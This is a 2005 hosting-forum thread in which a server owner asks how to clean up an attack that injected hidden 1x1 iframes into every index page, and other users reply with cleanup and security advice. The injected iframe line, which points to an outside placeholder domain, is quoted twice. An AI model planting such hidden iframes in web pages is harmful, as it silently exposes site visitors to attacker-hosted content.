#1 (permalink)  
Old 11-27-2005, 11:38 PM
vishwas's Avatar
Registered User
 
Join Date: Feb 2004
Location: Front of PC
Posts: 61
vishwas
Exclamation Server get hacked

Hello,

My server get hacked , what hacker do he runs some script & it puts these two lines in all .html and *.php file and all sites redirects to that domain. mainly it puts these two lines in all index file and its pain to remove these two line with editing each file :S may be its virus !!

Anyone have solution for this !!!!!

<iframe src='http://domain.com/images/index.html' width=1 height=1></iframe>
<iframe src='http://domain.com/images/index.html' width=1 height=1></iframe>
__________________
Life is short Have fun.

Last edited by vishwas; 11-28-2005 at 04:35 AM.
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
  #2 (permalink)  
Old 12-01-2005, 09:29 AM
Registered User
 
Join Date: Jan 2005
Posts: 100
jaymc is on a distinguished road
First thing to do is locate the mal CODE that is doing this

second is to write a simple php script or something to do a search and replace on all .htm files

str_replace()

will be of use

Also, you say 'hacked'... I would call this some one having an account on your server, and takin advantage of the OPEN_BASE security issue you have yet to address, thus giving him access to every file and folder on your server...

He could actually do a lot more than change HTM files, so think your self as lucky


Last edited by jaymc; 12-01-2005 at 09:31 AM.
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
  #3 (permalink)  
Old 12-01-2005, 11:41 AM
Registered User
 
Join Date: Oct 2005
Posts: 38
JohnodACD is on a distinguished road
I had this in my server as well it was a file called flame.php that was loaded in a users images folder. when this path was called it redirected all the sites to a forign server(meaning not mine).

When i suspended this site it then redirected all my sites to teh suspend page untill i rebooted teh server.

I also noticed that if you change the password for this domain or account on teh server they can still get access to it so you want to suspend the site if you can find teh files and then delete the files then change teh passowrd.
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
  #4 (permalink)  
Old 12-01-2005, 11:51 AM
AndyReed's Avatar
cPanel Partner NOC
cPanel Partner NOC Badge
 
Join Date: May 2004
Location: Minneapolis, MN
Posts: 2,212
AndyReed is on a distinguished road
Quote:
Originally Posted by vishwas
Hello,

My server get hacked , what hacker do he runs some script & it puts these two lines in all .html and *.php file and all sites redirects to that domain. mainly it puts these two lines in all index file and its pain to remove these two line with editing each file :S may be its virus !!

Anyone have solution for this !!!!!

<iframe src='http://domain.com/images/index.html' width=1 height=1></iframe>
<iframe src='http://domain.com/images/index.html' width=1 height=1></iframe>
Just in case you are overwhelmed with the cleaning up task, may I suggest you hire a sys admin to round up, secure and protect your server.
__________________
Andy Reed
ServerTune.com
Dedicated server hosting, Colocation Services, Server Management, and cPanel Licenses
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
  #5 (permalink)  
Old 12-01-2005, 11:02 PM
Banned
 
Join Date: Jul 2005
Posts: 537
jackie46 is an unknown quantity at this point
Should he hire you?
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
  #6 (permalink)  
Old 12-02-2005, 03:49 AM
chirpy's Avatar
Moderator
 
Join Date: Jun 2002
Location: Go on, have a guess
Posts: 13,495
chirpy will become famous soon enough
He can if you wishes to. Any has a good reputation on these forums for helping people in such situations, as have others.
__________________
Jonathan Michaelson
cPanel Forum Moderator

Need your cPanel servers secured and tuned?
cPanel Server Configuration, Security, Recovery and Antivirus/AntiSpam Services
Developers of the most effective (and free) Firewall & Security Solution for cPanel Servers - csf
http://www.configserver.com
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Reply

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are On



All times are GMT -5. The time now is 09:53 AM.


Powered by vBulletin® Version 3.8.2
Copyright ©2000 - 2010, Jelsoft Enterprises Ltd.
© cPanel Inc